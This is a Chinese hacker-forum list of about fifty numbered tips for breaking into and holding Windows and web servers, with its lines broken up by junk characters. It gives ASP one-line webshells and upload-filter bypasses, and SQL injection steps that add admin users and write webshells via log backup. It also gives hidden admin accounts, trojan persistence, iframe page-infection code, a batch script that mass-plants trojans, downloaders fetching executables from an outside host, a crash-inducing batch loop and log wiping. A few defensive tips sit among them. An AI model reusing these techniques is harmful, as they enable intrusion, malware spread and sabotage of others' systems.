1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,9 l! N& I4 g2 j& ?: u
cacls C:\windows\system32 /G hqw20:R: l; i" Q2 X7 W2 j( N
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入+ I/ d5 H3 e1 I2 z
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
, X, [* v9 v# w/ J% @2 j" ?" p4 Z% o3 c* j; T
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
7 n3 K9 l* F( g5 g" Z6 H* s! @4 W; o) a5 |" ?9 u
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
6 t, f ?4 D5 K4 A) y
9 j+ M2 e" v# ^# d- p4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号2 x% p$ l2 }: J8 F- m. z# |, ~+ ~
2 ^- }: u. r, u- ]. _6 U5、利用INF文件来修改注册表 p' X# t, X0 X5 g% h
[Version]
6 ]* S& m6 H+ g1 ^% ?Signature="$CHICAGO$"
) ?0 p' l# ^8 L. p6 Q[Defaultinstall]! K* a) d4 n& |* O) A* u* W
addREG=Ating% L5 Q- P" [* y
[Ating]
" u h: Y! Y. S: }. QHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
: X$ q( N3 ]1 X5 n/ e以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
( k' D3 s2 U- W( ]9 i# x! _% lrundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
) ]& @9 C A+ m1 p其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
6 A, |/ ]9 b+ GHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU5 d7 [3 m; i8 T& D: t4 c7 o
HKEY_CURRENT_CONFIG 简写为 HKCC
0 j: I, U4 L) q5 U0 v6 e/ x0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
+ \; J3 h% @0 N+ `6 A: {" q"1"这里代表是写入或删除注册表键值中的具体数据; Q$ p) U# s$ F
) j, {! x5 I; l0 ^. o; j; s, v
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,3 g/ ?8 c; ^* \+ S0 P
多了一步就是在防火墙里添加个端口,然后导出其键值
S: q% U; D1 ?8 C4 g; G[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]3 m8 A6 q6 w9 D
% A* t% ?+ d! P& }) b. j
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
O# n: d, T- y在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
6 a) y( {+ b6 }1 V T5 x
8 a8 y6 j- i# ~7 Q8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
4 ^* S( ^' b* X/ ~! o' p2 V+ R5 Y8 j2 x; o5 r9 Y8 s
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
$ h* ]& v1 n1 l- y( n( H, \可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。# Q8 [8 W6 y ]2 w- G3 q
- ?) G' W8 R6 v& E! q
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”6 Z& d: g" q6 O/ }; U, O9 X
- @$ _& d* K, \( V8 b6 R! |) ~. s11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff, P) O3 ~2 D. R8 {0 d, k' e) b
用法:xsniff –pass –hide –log pass.txt" T9 L4 ]9 \* j0 M+ i
& u; P) N/ Y$ W$ R6 u6 F/ k8 J5 W8 _
12、google搜索的艺术, U- ^2 J9 R5 s6 H2 v" @
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”1 S9 l: W( n3 V5 e+ o( S X8 z
或“字符串的语法错误”可以找到很多sql注入漏洞。
2 E( A! B* o4 q: t- V# x- Z
. U4 m. j8 f8 @& ?, {2 h13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。; r8 ]: N) u J2 H m( Z1 P- f p
: b, A% f3 V$ W( `5 P5 @) s14、cmd中输入 nc –vv –l –p 19878 A0 O1 Y- t' J* k2 v: g8 A3 Z
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃1 D; t4 Y$ K+ D+ p
$ E5 t" R: z4 E, D% C2 C15、制作T++木马,先写个ating.hta文件,内容为
8 p) P1 n1 D, O: H* {2 o9 H<script language="VBScript">8 \. v# G* m4 Q1 ]; A4 l
set wshshell=createobject ("wscript.shell" )% m# N; K# v% q% x& d* w% J& T
a=wshshell.run("你马的名称",1)
; ], ?' S* R% p4 V# u- [/ Fwindow.close& U4 X# o3 |/ L" ]* ~; e6 d. l! y
</script>
+ O0 c- h' C8 C; P再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。7 F- m5 G; i+ ], Q4 {( d% N
+ N! {' j* |4 Q5 Q: Q* K. y16、搜索栏里输入6 ~+ x0 T1 V; O6 T# @1 P/ N! M; e, {) l
关键字%'and 1=1 and '%'='
/ z, ?6 E5 e# _, J* M& n关键字%'and 1=2 and '%'='& e/ `. M. i$ Z4 ~- t
比较不同处 可以作为注入的特征字符
" S/ E6 `" {1 o7 x) F; s+ V1 h a' O4 k. P, J
17、挂马代码<html>
8 n8 W" v4 o# f; A<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>9 [7 ?3 l4 K3 |$ ^4 H9 p
</html>7 U2 R& p# a5 v( p: {
. e7 J3 c1 U" r1 Y$ g
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
" t, A9 c4 M! E/ L2 Rnet localgroup administrators还是可以看出Guest是管理员来。6 G2 u/ q: p. U
& t2 u4 C! X4 {! Z+ d7 Z19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等4 ]$ O2 V. n" P6 r0 V J5 Q
用法: 安装: instsrv.exe 服务名称 路径- k" b- x$ J, u, x
卸载: instsrv.exe 服务名称 REMOVE
$ P( B9 x- y6 C4 B0 y9 [) t
8 S2 ]8 |7 p2 @! j$ V7 w) q8 m& c& \7 N4 o0 y. w+ U) k% C
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
: P H" ~6 |3 I& I0 m2 e. ~不能注入时要第一时间想到%5c暴库。
0 K& I' U0 @( c/ n. s& |& Y: ?5 g+ o, k) X
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~9 ]5 n3 N# `+ X# L' s: c8 o* p
; W$ u+ a; h0 G* K! e$ y* ]
23、缺少xp_cmdshell时: u! [7 }6 I6 ^% g, }' ^* p8 R
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'7 b5 y9 j+ D1 f$ B" L( ?, |
假如恢复不成功,可以尝试直接加用户(针对开3389的)
; t1 G. N6 d' J! R# m4 |$ mdeclare @o int
& a v, y& E" P; E ~- z3 `exec sp_oacreate 'wscript.shell',@o out: ?2 b4 F( `3 F) l9 \. x) p
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
4 m3 a6 |! t' }/ f3 b1 E" W, k% w- Y6 S4 c+ g
24.批量种植木马.bat3 Z- r) m1 S7 j1 @
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中0 r! [( X# r+ z& d/ l& ?) b; F
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
' Y6 D% ~) x4 Y2 f/ Z0 ?扫描地址.txt里每个主机名一行 用\\开头
/ S( S* f5 B0 q6 T% n
3 n3 A# b1 U' g$ q4 ]25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
. I! J7 v, s. ]9 X* l/ J: R* I9 c
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.: E. q7 B4 V* K! g! V3 n% s# Y
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
9 m* R7 ]" x: _4 ^" Y) ^' `.cer 等后缀的文件夹下都可以运行任何后缀的asp木马6 O$ l ^" V4 W: ~4 c2 q& _
+ n- W" Q- {) c0 |' q; ]1 c
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
8 Z* m" g" {* [2 J然后用#clear logg和#clear line vty *删除日志
T2 n3 V+ `: C$ [! L! H3 x. ]) M! Z
28、电脑坏了省去重新安装系统的方法
( Q, [# I" z. j3 }+ o- e纯dos下执行,$ \) V: R2 H9 a8 G( e# ]. x
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config$ j6 W3 R5 {) }9 `
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config2 a! g8 M8 z. f6 X
) J8 m* G9 B! [! ?$ M' |& y29、解决TCP/IP筛选 在注册表里有三处,分别是:
8 b/ W! X/ z. V" w3 q' X) eHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip, R- t2 E$ _" R8 r3 W! n
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip& z+ R! i0 ^4 k9 J! m
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
% F( n% l# B5 H- C2 j5 k分别用
% O9 U# `( Y) R2 iregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip7 L: K- W' _/ W. E1 Q( [* T
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
8 D) p- K1 P- h; ^9 O+ @$ kregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip* ?+ m4 l" p7 s7 I6 f: L
命令来导出注册表项4 R4 N1 Z% w: J5 M/ I3 P. \
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
" Z! Q- w% a* A2 V: W改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用3 m% l3 Q0 q( Z+ T
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。, i7 v7 ^% t% K" e# A$ F3 Y
5 Z& `- X/ j* }1 j" Q" w
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
! Q# S. ?1 c' aSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3; V; ~4 B& _9 v+ V, P- F0 A6 `
g* A2 F$ f: q31、全手工打造开3389工具
) I2 o, _3 [) H5 S8 x) v* `5 S打开记事本,编辑内容如下:6 u- `6 l, h- _, _6 D+ h
echo [Components] > c:\sql
& {/ E- i* ^5 o% e! d7 Fecho TSEnable = on >> c:\sql$ L( Z7 k$ [/ j: d7 ^
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q' z0 |8 {$ ]! R5 m
编辑好后存为BAT文件,上传至肉鸡,执行8 ^/ r: @* q x: `+ l9 i; w
& {6 r# Z+ p8 R5 Y* ~! \32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
( D6 b" c. a/ j8 `) a
" ]9 o9 Q2 Y1 P3 M6 a33、让服务器重启/ K7 P- B5 m s& D
写个bat死循环:
; B; M9 s# M2 Q1 T@echo off" V _5 h, {% R4 T+ v* Y
:loop10 g9 ^# b; n$ }) k" x; I! S1 ]
cls) q- r; A2 Z/ L( v
start cmd.exe+ x! g6 o4 b3 l2 x9 d
goto loop1
1 y' c! y- X5 `7 N保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启2 `+ E7 E( ~3 H+ R; n5 j
2 g8 R$ m$ _+ `1 R* |7 f" `
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
7 x: Z) R; y7 ]( q+ z@echo off! n; |3 d5 k: t
date /t >c:/3389.txt# `" F9 t' c1 ], P0 q+ o! P% F4 D
time /t >>c:/3389.txt
2 J. j1 V( l# l5 e' s6 Xattrib +s +h c:/3389.bat
5 y# ]" K, G3 ]' z3 Uattrib +s +h c:/3389.txt1 K) y; n) {. I. [$ a+ u9 C' H
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt6 t9 U( {( ]' d5 e
并保存为3389.bat
5 @( `- Z8 Q! ?4 s$ k打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
5 @- t. D3 j g" y( V/ u
5 ?- b Z3 W1 n" ?! P7 p$ O2 T35、有时候提不了权限的话,试试这个命令,在命令行里输入: P# ]* O: `* n p
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
: s- u0 U. t( `7 E4 Z# D输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。) Q& v/ t. Q: I6 D# I ?
0 D6 r6 A: H b% [. R36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件9 F2 `: q: ]. w* ~- q
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址0 Q; N* g8 C8 G. P" H, T- Y9 \
echo 你的FTP账号 >>c:\1.bat //输入账号# @4 k0 I1 s, B8 i
echo 你的FTP密码 >>c:\1.bat //输入密码
4 q F$ ~; [; A- f/ n5 N; _( l& lecho bin >>c:\1.bat //登入- o; n) |* C( A
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么8 u5 N1 A6 K9 m
echo bye >>c:\1.bat //退出
: S: D) w( V% L" V* n) ]然后执行ftp -s:c:\1.bat即可
) r# P* Y! |8 O( W6 v3 G6 S( `% d
( |) M2 h& e$ }3 F37、修改注册表开3389两法3 V: Y; h" c+ q' D' m3 R+ @
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表, A. j2 n0 N5 a, s1 x, {7 u
echo Windows Registry Editor Version 5.00 >>3389.reg
v; E7 j, @. c; ]5 Y8 {* hecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg9 Q$ Y7 i6 G1 {0 j
echo "Enabled"="0" >>3389.reg" x o9 _" \; _ I: D* w D* [5 Z
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
+ I- A) t; \3 @NT\CurrentVersion\Winlogon] >>3389.reg
! z0 m6 |. N3 q4 X0 Decho "ShutdownWithoutLogon"="0" >>3389.reg
" G% @- s6 }( Y1 Y9 a6 ]' g; A& uecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
+ N1 C/ p/ O; M0 ]7 Y- Q/ Q>>3389.reg4 N H# ]& H6 ?/ x0 {
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg, S) ]6 M+ Q% d% N5 [
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
6 \ m+ \4 @1 r$ T; l3 F; q* E0 V>>3389.reg2 D# L* \6 W/ M6 M. b! Z2 ]% \' v$ O6 v
echo "TSEnabled"=dword:00000001 >>3389.reg
8 G8 [1 v9 s) k, c' p# m- Pecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg E: e7 S2 x7 l! g! U, V7 {
echo "Start"=dword:00000002 >>3389.reg
/ X; d4 W8 s J- {echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]8 N$ d, p" k+ w9 |# I* p
>>3389.reg& E/ N" y! k" a) b9 b
echo "Start"=dword:00000002 >>3389.reg
. \6 D+ X9 k" U& j9 _. \echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg7 V; p# J6 X- k4 Q
echo "Hotkey"="1" >>3389.reg \! c6 m. K+ g( y
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
& O2 C3 v/ y5 q4 [Server\Wds\rdpwd\Tds\tcp] >>3389.reg
5 N" E8 K1 G+ j* V" U$ techo "PortNumber"=dword:00000D3D >>3389.reg4 l' H7 ~# U# ^+ I( g# C' p1 P
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal% B# ]% _" h! P& @0 _! a; V
Server\WinStations\RDP-Tcp] >>3389.reg
9 W1 f$ z6 D- y7 K6 v2 j8 lecho "PortNumber"=dword:00000D3D >>3389.reg
5 u b4 G( J% F' u把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。& Z+ ]) }2 S0 w- m+ u) @
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
% g S" D! ]2 h; g3 B4 A因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
- J0 V) J, j3 S9 v, d% j+ s7 V8 j- G! e(2)winxp和win2003终端开启
( B6 h& z" C8 t! |7 C用以下ECHO代码写一个REG文件:
! Y" E" i0 H* ]3 r$ B' c' C9 fecho Windows Registry Editor Version 5.00>>3389.reg2 x2 S% k' H" f: s0 o7 ^1 [
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
8 Z M& }# D P5 y0 F, T xServer]>>3389.reg
8 S; ]8 J% d9 r vecho "fDenyTSConnections"=dword:00000000>>3389.reg
+ Q3 z7 R3 J$ R: }echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal6 ]$ v. n7 d8 y9 ?1 q
Server\Wds\rdpwd\Tds\tcp]>>3389.reg. k* Q9 Z- ?+ e0 ?
echo "PortNumber"=dword:00000d3d>>3389.reg
% g+ l8 H6 V o" t' t. E- o, K- Aecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
7 W9 {# n; v/ y8 K. |$ Q1 DServer\WinStations\RDP-Tcp]>>3389.reg/ S% s e! B, g2 `% e* ~0 j
echo "PortNumber"=dword:00000d3d>>3389.reg
- L7 i0 e& J. ~) E0 h然后regedit /s 3389.reg del 3389.reg; J8 Y' u! g3 a
XP下不论开终端还是改终端端口都不需重启
`4 x) [9 ~1 l) ?% y" M/ F' j8 u! K) Q. u. _
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
! Q. Y3 W) w8 N# m用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
3 n5 H. ?1 a, I- W) I
; O! ?* l7 A) h+ A. @39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!9 z- z# S; l2 m9 X$ h# f) f/ Q3 p
(1)数据库文件名应复杂并要有特殊字符, o6 c, ^5 C8 ~, l4 l( d
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
+ x0 t3 p2 W1 H2 a; g1 Y将conn.asp文档中的 Q( c0 l8 H/ h0 V8 ~+ f t; Y
DBPath = Server.MapPath("数据库.mdb")# P: L* |' {' D) E
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath3 E( D- c8 F. s: q) Z8 L6 [! U
; L v1 F" p7 l5 \8 z1 C修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置! k+ r! J1 Y) _/ v2 D9 ~
(3)不放在WEB目录里
. c5 G; Q [3 h6 P. L; [9 F" {+ o# @* f2 o# W0 N9 Q; B, S* R
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
% {/ e9 c9 U0 \) b m可以写两个bat文件1 ^5 z+ j" i# D' w/ w) f
@echo off
, e0 W) v8 T# T/ |8 h$ Y' s; J9 H) l@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe# K% C' I# r0 ^* F
@del c:\winnt\system32\query.exe( [6 A" F6 f% [" Z$ d2 w+ ~# ]
@del %SYSTEMROOT%\system32\dllcache\query.exe
- g. S3 X* g: }@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
+ i* e! ], f$ W' |4 E9 X3 Y9 n2 ?3 f8 t0 @+ P! R" A4 b
@echo off. f3 }7 \; [0 Q4 w( X
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
9 `4 e. O) q, ?( \3 T@del c:\winnt\system32\tsadmin.exe8 H& c3 p+ q1 z0 M; L6 t
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex+ t3 ?9 p. `3 B" \& s
& V8 w5 |( c! P ]1 \& J5 J6 \& |1 O
41、映射对方盘符
9 n8 Z" L. G$ [/ ?% z, Jtelnet到他的机器上,
- S" V% A+ a) ^3 W9 R/ Y+ bnet share 查看有没有默认共享 如果没有,那么就接着运行
8 Z5 l: E$ e* Rnet share c$=c:: `2 n9 S9 D* H$ s2 B
net share现在有c$. c( A3 A! T0 c" Q w* J6 R' E
在自己的机器上运行2 F. x4 i$ G, |3 X
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K5 r. R( t9 q6 ]# o6 ^$ z5 e
: ]3 O( Z9 b) d# G# w( r8 S
42、一些很有用的老知识+ l1 @! d8 U5 H, I7 O
type c:\boot.ini ( 查看系统版本 )
9 G7 I) Z9 n, rnet start (查看已经启动的服务)
# K6 [& G& T. v$ t' H, squery user ( 查看当前终端连接 )* G) }/ ~8 O' ^% h( o1 b
net user ( 查看当前用户 )
0 J! t% A0 ~6 D; L8 cnet user 用户 密码/add ( 建立账号 )
8 b$ l9 c) K- M5 e7 Unet localgroup administrators 用户 /add (提升某用户为管理员)
# [; n/ A) ~, U: U7 ]ipconfig -all ( 查看IP什么的 )4 k/ e( q" Z3 H* Q& H
netstat -an ( 查看当前网络状态 )+ k C9 ?9 f0 \
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)6 K L2 i# ]% x( l3 t
克隆时Administrator对应1F48 [) m% S8 }* t5 t( @5 D0 Y
guest对应1F5. W* y, T* E& M+ |# a
tsinternetuser对应3E8
5 m) Q; W2 U+ a2 X- z3 D# h
2 L+ y( I& a7 R3 X C$ R( U43、如果对方没开3389,但是装了Remote Administrator Service
6 \ M( X# @3 _用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
! B% s/ x, v! b6 ], o解释:用serv-u漏洞导入自己配制好的radmin的注册表信息! C% n8 a8 y4 S
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"+ r0 p2 D6 W8 o1 R# S. O
5 W; ?1 {. R* W/ i
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)' ~* C- V! @5 l6 L! z% C
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口); b$ H. J( y/ p+ x" H$ q: t0 \
; M9 S; y! Q" e1 G3 O# W6 c
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)9 a) c% `& T( q$ z
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
5 q' z9 s& x! ^^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
: A: A1 K( w+ fCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =1 W5 A _% a/ [
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
6 S& B7 u9 c1 W) i- x8 p6 f(这是完整的一句话,其中没有换行符)$ p+ ` ?0 z* R
然后下载:4 `" A1 D# K) i& q: [ L
cscript down.vbs http://www.hack520.org/hack.exe hack.exe% D( Y% f& Z3 F$ O5 n. S3 `* W
% P2 W1 W; {7 |' U" ]+ E% n( {46、一句话木马成功依赖于两个条件:
& a d- I/ W, d( e1、服务端没有禁止adodb.Stream或FSO组件) W/ T# M4 K2 O) y
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
4 X8 _8 y0 L: _! K8 ~( H7 M6 ^ L; ~+ r3 [" Z" ~; n
47、利用DB_OWNER权限进行手工备份一句话木马的代码:0 A% h! R& J% J: \1 e; L
;alter database utsz set RECOVERY FULL--2 Y( ~ n* v. l2 e
;create table cmd (a image)--
! Z* Q4 M: q. [$ |6 v1 _;backup log utsz to disk = 'D:\cmd' with init--* J" }. j W5 |% n4 k
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--5 K$ m- I6 n8 O) C4 a w- G
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--5 _0 W" c0 X5 m# i* E" Z
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。8 v- r) Z) b' }" d n
% W" \7 H" K/ b8 R3 [, j7 Y+ C48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
; P/ O6 D6 \# ~! X$ J$ \
' N& e, J. r$ K' ~9 S5 i) }用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
# j" _! Z- J2 d' y所有会话用 'all'。
% g4 i4 Z6 g' h, R# C" t7 ^-s sessionid 列出会话的信息。 p2 T- D& W2 w- [* c( Z- d3 I
-k sessionid 终止会话。
2 m& ]7 [# ~7 E0 I3 n. F-m sessionid 发送消息到会话。
! V% c. L& u* R! I8 Q3 G) |1 {5 k5 J3 j4 O
config 配置 telnet 服务器参数。# z: `% e/ c( `
8 J) E9 ?$ C! Kcommon_options 为:1 k& f, T: e; k6 R- F
-u user 指定要使用其凭据的用户
/ s2 U( U. x8 X-p password 用户密码# q) `. Z3 f( O0 Y7 @
' C6 x1 B) U7 U
config_options 为:
% r( ^' `) z- I9 Q' E( sdom = domain 设定用户的默认域# @; J3 R6 Z9 M. V
ctrlakeymap = yes|no 设定 ALT 键的映射( {/ k6 Q6 g) v+ p; v) `
timeout = hh:mm:ss 设定空闲会话超时值
" [- ~3 A& S2 Etimeoutactive = yes|no 启用空闲会话。3 N$ q5 m# E& @
maxfail = attempts 设定断开前失败的登录企图数。
5 e: y; Y! J4 f- S4 h* jmaxconn = connections 设定最大连接数。2 h- g* h8 R! t: i0 [( b& I# D
port = number 设定 telnet 端口。$ T/ m5 U0 m4 N- q8 y1 N
sec = [+/-]NTLM [+/-]passwd
+ ^/ h L. c8 U) i6 [/ R设定身份验证机构! i+ v* L1 L- }8 a. _
fname = file 指定审计文件名。 q1 \- X3 N y7 z8 M0 j. B& b# o
fsize = size 指定审计文件的最大尺寸(MB)。
( I; a7 V& Z2 D2 |# [8 qmode = console|stream 指定操作模式。
& g' ~& i* y/ D2 V" h# X3 @+ Eauditlocation = eventlog|file|both1 _1 b& L" \0 O, j
指定记录地点 ~0 m1 H& S! \, E v E0 V
audit = [+/-]user [+/-]fail [+/-]admin6 z0 x- `$ E" I7 x0 N L4 k
1 x+ k' b- ]' p4 [49、例如:在IE上访问:3 w8 Y) B$ w1 p
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/& ?& \2 \1 V" T" q2 x; q
hack.txt里面的代码是:
" S; ]( h A3 j8 C( ]<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">+ }7 {. {& ~$ h
把这个hack.txt发到你空间就可以了!
$ c2 q3 ?: z7 M+ T" ?- J# L这个可以利用来做网马哦!; W( T# X6 b5 p. q
( M. P G) G7 P1 X$ u50、autorun的病毒可以通过手动限制!
3 {6 N1 I1 z$ x: x' ^6 x, q% b1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!, h& K, \$ B; Q+ k
2,打开盘符用右键打开!切忌双击盘符~; p! k, z8 a+ z! c. }* w: ?% |( L
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!& W& O3 I7 p7 k8 \
- ~. E8 \% m: z5 N& N+ W51、log备份时的一句话木马:
2 _9 s. `3 i7 R5 ha).<%%25Execute(request("go"))%%25>
/ d& S; O+ l- b. _6 u2 Rb).<%Execute(request("go"))%>1 f4 O0 I4 Q5 l
c).%><%execute request("go")%><%
2 @* F7 O4 P' T1 J2 q+ I' p$ Bd).<script language=VBScript runat=server>execute request("sb")</Script>
# M. Z3 g! \$ }+ @5 a he).<%25Execute(request("l"))%25>1 `& g2 ^- h+ [8 ~# x; h
f).<%if request("cmd")<>"" then execute request("pass")%>
; v! t# X6 }, k# B1 B6 b
4 _ H% R5 N: d% j52、at "12:17" /interactive cmd
7 T* u) u8 }" m. N8 {7 A执行后可以用AT命令查看新加的任务
